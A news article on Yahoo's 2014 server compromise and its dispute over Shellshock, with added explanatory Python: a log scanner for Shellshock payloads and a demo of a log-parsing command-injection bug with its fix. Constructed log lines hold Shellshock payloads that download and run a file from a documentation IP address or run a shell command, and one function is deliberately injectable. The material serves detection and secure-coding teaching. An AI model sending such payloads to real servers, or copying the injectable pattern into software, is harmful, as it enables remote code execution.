Yahoo confirms servers infected — but not by Shellshock

Yahoo says no customer data was placed at risk after servers were infiltrated by malware -- and the insidious Shellshock bug was not at fault.
Written by Charlie Osborne, Contributing Writer

Yahoo has confirmed a "handful" of infected servers have been discovered, but says the Shellshock bug is not to blame.

The tech giant came under scrutiny following a report published by Future South Technologies earlier this week. Jonathan Hall, senior engineer and president of the security company, said that Yahoo's systems were breached using the Shellshock bug, and that Romanian hackers running scripts designed to build botnets for DDoS attacks were to blame.

The report also said that Lycos and WinZip were vulnerable to Shellshock; Lycos has denied any breach, while WinZip confirmed the problem and thanked the researcher.

Shellshock (CVE-2014-6271 and its follow-ups) is a severe vulnerability in Bash, the open-source shell used as the default command-line interpreter on many operating systems, including Linux, variants of Unix and Apple's OS X. Vulnerable versions of Bash imported function definitions from environment variables and kept executing whatever followed the function body, so any service that copies attacker-controlled text into the environment before invoking Bash (a CGI script receiving HTTP headers is the classic case) lets an unauthenticated attacker run arbitrary commands. Those commands run with the privileges of the process that invoked Bash, typically an unprivileged web server account, which limits an attacker in the first instance; but a foothold of that kind is enough to attempt privilege escalation and eventually gain full control of the system.
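The following is an added example, not code from the article or from any of the companies it mentions. It shows how a User-Agent header reaches Bash's environment through a CGI gateway, and a log scanner for the exported-function pattern that tolerates the whitespace, body and URL-encoding variations an attacker might try against a signature-based filter (working or not; the detector is deliberately broader than what Bash itself parsed as a function import). The request headers and access-log lines are constructed for the example.

```python
# Added example (not from the article or from Yahoo): how a Shellshock payload
# reaches Bash through a CGI environment, plus a log-scanning detector that
# tolerates mutated payloads. All requests and log lines are constructed.
import re
from urllib.parse import unquote

# The canonical 2014 proof-of-concept string; naive filters matched it literally.
NAIVE_SIGNATURE = "() { :;};"

# Mutation-tolerant pattern: "()" then "{", any function body, "}", then ";".
# Neither the whitespace nor the body is fixed, so "() {:;};", "(){ _; } ;"
# and similar variants still match. This is broader than what Bash accepted
# as a function import; the goal is to catch attempts, not only working ones.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;")


def cgi_environment(headers):
    """Map HTTP headers to CGI environment variables the way a gateway does
    (HTTP_<NAME>). This is how a User-Agent string ends up in Bash's
    environment when the CGI handler, or anything it runs, is a Bash script."""
    return {"HTTP_" + name.upper().replace("-", "_"): value
            for name, value in headers.items()}


def normalize(value):
    """Strip URL encoding, repeatedly, so percent-encoded payloads are seen
    in the form Bash would see after the web server decoded them."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value


def is_shellshock_payload(value):
    return SHELLSHOCK_RE.search(normalize(value)) is not None


def naive_match(value):
    return NAIVE_SIGNATURE in value


def user_agent(log_line):
    """Last quoted field of a combined-format access log line."""
    return log_line.rsplit('"', 2)[-2]


def scan_log(lines, matcher=is_shellshock_payload):
    """Return (line number, user-agent) for every line the matcher flags."""
    return [(n, user_agent(line)) for n, line in enumerate(lines, 1)
            if matcher(user_agent(line))]


# Constructed log lines: one benign request, then the canonical payload and
# three mutated variants of it (no-space body, "_" body with extra spaces,
# and a URL-encoded copy).
LOG_LINES = [
    '203.0.113.5 - - [06/Oct/2014:10:01:02 +0000] "GET /sports/api/v1/scores HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [06/Oct/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /usr/bin/wget -O /tmp/b http://203.0.113.9/b"',
    '198.51.100.7 - - [06/Oct/2014:10:01:06 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() {:;}; /usr/bin/curl -o /tmp/b http://203.0.113.9/b"',
    '198.51.100.7 - - [06/Oct/2014:10:01:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "(){ _; } ; /usr/bin/perl /tmp/b"',
    '198.51.100.7 - - [06/Oct/2014:10:01:08 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "()%20%7B%20:;%20%7D;%20/bin/sh%20-c%20id"',
]

if __name__ == "__main__":
    env = cgi_environment({"User-Agent": user_agent(LOG_LINES[1])})
    print("CGI environment handed to the handler:", env)
    print("naive signature hits:", [n for n, _ in scan_log(LOG_LINES, naive_match)])
    print("mutation-tolerant hits:", [n for n, _ in scan_log(LOG_LINES)])
```

Run against the constructed log, the literal signature flags only the canonical line, while the pattern-based check flags all four attack lines. The same trade-off applies to a WAF or IDS rule: a literal string is easy to evade, a structural pattern is harder, and either way the log should be scanned for what actually arrived rather than for what the filter expected.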

In a post to Hacker News, Yahoo CISO Alex Stamos disputed Hall's claims, saying that after "investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock."

"Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers," Stamos writes. "These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs."
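The bug Stamos describes is a command injection in a script that parses web logs, not Shellshock itself. The following is an added illustration of that class of bug, not Yahoo's script: a hypothetical log-debugging helper that counts how often a user-agent appears in the access log, first in the injectable shape (log text spliced into a shell command string) and then hardened. The command, the log lines and the file layout are assumptions constructed for the example.

```python
# Added example (not Yahoo's script): a hypothetical log-parsing helper of the
# kind the quote above describes, in its injectable form and then hardened.
# The wrapped command and the log lines are constructed for the example.
import shlex
import subprocess
import tempfile

# Constructed access-log lines: a benign request and a Shellshock-style probe.
LOG_LINES = [
    '203.0.113.5 - - [06/Oct/2014:10:01:02 +0000] "GET /sports/api/v1/scores HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [06/Oct/2014:10:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /usr/bin/wget -O /tmp/b http://203.0.113.9/b"',
]


def write_sample_log():
    """Write the constructed lines to a temp file so grep has something to read."""
    f = tempfile.NamedTemporaryFile("w", suffix=".log", delete=False)
    f.write("\n".join(LOG_LINES) + "\n")
    f.close()
    return f.name


LOG_PATH = write_sample_log()


def user_agent(log_line):
    """Last quoted field of a combined-format access log line."""
    return log_line.rsplit('"', 2)[-2]


def count_vulnerable(needle, path=LOG_PATH):
    """Bug: untrusted text spliced into a command string that /bin/sh parses.
    A ';', '&&', '|', '$()' or backtick inside the user-agent turns log data
    into commands run as the monitoring user. Returns raw stdout."""
    cmd = f"grep -c {needle} {path}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL).stdout


def count_hardened(needle, path=LOG_PATH):
    """Fix: an argv list and no shell. The needle reaches grep as one argument,
    metacharacters and all; -F makes it a fixed string and -- stops it being
    read as an option. grep exits 1 on zero matches, so check=True is not used."""
    out = subprocess.run(["grep", "-c", "-F", "--", needle, path],
                         capture_output=True, text=True, stdin=subprocess.DEVNULL)
    return out.stdout.strip()


def count_quoted(needle, path=LOG_PATH):
    """If a shell is genuinely needed (pipelines, globs), quote every untrusted
    token with shlex.quote so the shell sees a single literal word."""
    cmd = f"grep -c -F -- {shlex.quote(needle)} {shlex.quote(path)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL).stdout.strip()


if __name__ == "__main__":
    payload = "x; echo INJECTED"  # benign stand-in for an attacker's command
    print("vulnerable:", repr(count_vulnerable(payload)))
    print("hardened:  ", count_hardened(payload))
    print("quoted:    ", count_quoted(payload))
    print("literal count of the probe line:", count_hardened(user_agent(LOG_LINES[1])))
```

The vulnerable variant runs the injected `echo`, and a real payload would run whatever the attacker placed after the `;`. The hardened variant treats the whole user-agent, including the Shellshock probe, as an opaque string to search for and reports that it appears once. The rule is the same one that applies to request parameters: text that arrived over the network does not stop being attacker-controlled because it was written to a log first.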

Stamos says the servers were isolated immediately. The affected API servers provide live game data for sports streaming and do not hold or store user data, and the company has found no evidence that user data was affected. The exploit pattern has also been added to the code scanners in Yahoo's CI/CD pipeline so that similar injection bugs are caught before they reach production.

However, it is worth keeping in mind that attackers often enter through the weakest link in a chain -- a low-value server or a third-party system with access to the network they actually want -- and then pivot from it. Isolating the compromised hosts is containment, not a complete response: the investigation still has to establish what the attackers' code did while it ran and whether it touched anything beyond those machines.

In addition, Stamos says Yahoo's records show no attempt by Hall to reach the company through its security reporting channels, despite the researcher saying he "attempted to contact Yahoo several times" and resorted to "emailing Marissa Mayer and contacted her via Twitter, both of which yielded zero results and no response." Hall has also posted what appears to be correspondence with a member of Yahoo's security team, Ricky Connell.

Stamos said:

"Yahoo takes external security reports seriously and we strive to respond immediately to credible tips. We monitor our Bug Bounty and security aliases 24x7, and our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation."
